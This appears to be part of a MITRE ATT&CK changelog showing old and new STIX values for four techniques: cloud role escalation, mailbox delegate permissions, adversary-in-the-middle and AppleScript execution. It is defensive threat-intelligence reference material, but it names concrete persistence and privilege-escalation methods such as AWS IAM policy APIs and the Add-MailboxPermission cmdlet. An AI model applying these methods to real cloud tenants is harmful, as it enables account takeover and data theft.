| external_references[5]['url'] | https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add | https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 |
| external_references[6]['source_name'] | Expel IO Evil in AWS | Microsoft SolarWinds Customer Guidance |
| external_references[6]['description'] | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020. |
| external_references[6]['url'] | https://expel.io/blog/finding-evil-in-aws/ | https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ |
| x_mitre_data_sources[0] | User Account: User Account Modification | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[1] | Active Directory: Active Directory Object Modification | User Account: User Account Modification |
| x_mitre_version | 2.2 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'} | |
| x_mitre_contributors | Zur Ulianitzky, XM Cyber | |
| x_mitre_contributors | Alex Soler, AttackIQ | |
| x_mitre_platforms | SaaS |
| Old Description | New Description |
|---|---|
| An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. | An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles)
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 12:40:02.331000+00:00 | 2022-10-24 15:21:19.955000+00:00 |
| name | Add Office 365 Global Administrator Role | Additional Cloud Roles |
| description | An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. | An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles)
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in Azure AD environments, an adversary with the Application Administrator role can add [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to their application's service principal. In doing so the adversary would be able to gain the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) Similarly, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
Similarly, an adversary with the Azure AD Global Administrator role can toggle the “Access management for Azure resources” option to gain the ability to assign privileged access to Azure subscriptions and virtual machines to Azure AD users, including themselves.(Citation: Azure AD to AD) |
| external_references[1]['source_name'] | Microsoft Support O365 Add Another Admin, October 2019 | Expel AWS Attacker |
| external_references[1]['description'] | Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. | Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022. |
| external_references[1]['url'] | https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d | https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/ |
| x_mitre_detection | Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. | Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. |
| x_mitre_version | 1.0 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'SpecterOps Azure Privilege Escalation', 'description': 'Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.', 'url': 'https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5'} | |
| external_references | {'source_name': 'AWS IAM Policies and Permissions', 'description': 'AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.', 'url': 'https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html'} | |
| external_references | {'source_name': 'Google Cloud IAM Policies', 'description': 'Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/iam/docs/policies'} | |
| external_references | {'source_name': 'Microsoft Support O365 Add Another Admin, October 2019', 'description': 'Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.', 'url': 'https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d'} | |
| external_references | {'source_name': 'Azure AD to AD', 'description': 'Sean Metcalf. (2020, May 27). From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path. Retrieved September 28, 2022.', 'url': 'https://adsecurity.org/?p=4277'} | |
| external_references | {'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'} | |
| x_mitre_contributors | Alex Parsons, Crowdstrike | |
| x_mitre_contributors | Chris Romano, Crowdstrike | |
| x_mitre_contributors | Wojciech Lesicki | |
| x_mitre_contributors | Pià Consigny, Tenable | |
| x_mitre_contributors | Clément Notin, Tenable | |
| x_mitre_contributors | Praetorian | |
| x_mitre_contributors | Alex Soler, AttackIQ | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | SaaS | |
| x_mitre_platforms | Google Workspace | |
| x_mitre_platforms | Azure AD |
| Old Description | New Description |
|---|---|
Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452) This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) |
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.
For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 18:57:04.148000+00:00 | 2022-04-19 14:55:26.110000+00:00 |
| name | Exchange Email Delegate Permissions | Additional Email Delegate Permissions |
| description | Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) |
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.
For example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) |
| external_references[1]['source_name'] | Microsoft - Add-MailboxPermission | Bienstock, D. - Defending O365 - 2019 |
| external_references[1]['description'] | Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019. | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps | https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 |
| external_references[2]['source_name'] | FireEye APT35 2018 | Crowdstrike Hiding in Plain Sight 2018 |
| external_references[2]['description'] | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. | Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf | https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ |
| external_references[3]['source_name'] | Crowdstrike Hiding in Plain Sight 2018 | Google Ensuring Your Information is Safe |
| external_references[3]['description'] | Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020. | Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022. |
| external_references[3]['url'] | https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ | https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html |
| external_references[4]['source_name'] | Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452 | Gmail Delegation |
| external_references[4]['description'] | Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021. | Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html | https://support.google.com/a/answer/7223765?hl=en |
| external_references[5]['source_name'] | Bienstock, D. - Defending O365 - 2019 | FireEye APT35 2018 |
| external_references[5]['description'] | Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019. | Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. |
| external_references[5]['url'] | https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 | https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft - Add-MailboxPermission', 'description': 'Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.', 'url': 'https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps'} | |
| external_references | {'source_name': 'Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452', 'description': 'Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html'} | |
| x_mitre_data_sources | User Account: User Account Modification | |
| x_mitre_platforms | Google Workspace |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | User Account: User Account Modification |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service. | Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-94 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-28 13:09:51.467000+00:00 | 2022-10-19 19:51:41.858000+00:00 |
| description | Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) Adversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service. | Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |
| external_references[1]['source_name'] | capec | dns_changer_trojans |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/94.html | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats |
| external_references[2]['source_name'] | Rapid7 MiTM Basics | volexity_0day_sophos_FW |
| external_references[2]['description'] | Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020. | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| external_references[2]['url'] | https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/ | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| x_mitre_version | 2.0 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'taxonomy_downgrade_att_tls', 'description': "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", 'url': 'https://arxiv.org/abs/1809.05681'} | |
| external_references | {'source_name': 'ad_blocker_with_miner', 'description': 'Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.', 'url': 'https://securelist.com/ad-blocker-with-miner-included/101105/'} | |
| external_references | {'source_name': 'mitm_tls_downgrade_att', 'description': 'praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.', 'url': 'https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/'} | |
| external_references | {'source_name': 'Rapid7 MiTM Basics', 'description': 'Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.', 'url': 'https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/'} | |
| external_references | {'source_name': 'tlseminar_downgrade_att', 'description': 'Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.', 'url': 'https://tlseminar.github.io/downgrade-attacks/'} | |
| external_references | {'source_name': 'ttint_rat', 'description': 'Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.', 'url': 'https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/94.html', 'external_id': 'CAPEC-94'} | |
| x_mitre_contributors | Mayuresh Dani, Qualys | |
| x_mitre_contributors | NEC | |
| x_mitre_data_sources | Application Log: Application Log Content | |
| x_mitre_data_sources | Service: Service Creation | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Service: Service Creation |
| Old Description | New Description |
|---|---|
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript) AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-08-03 21:40:51.878000+00:00 | 2022-10-19 15:37:28.071000+00:00 |
| description | Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
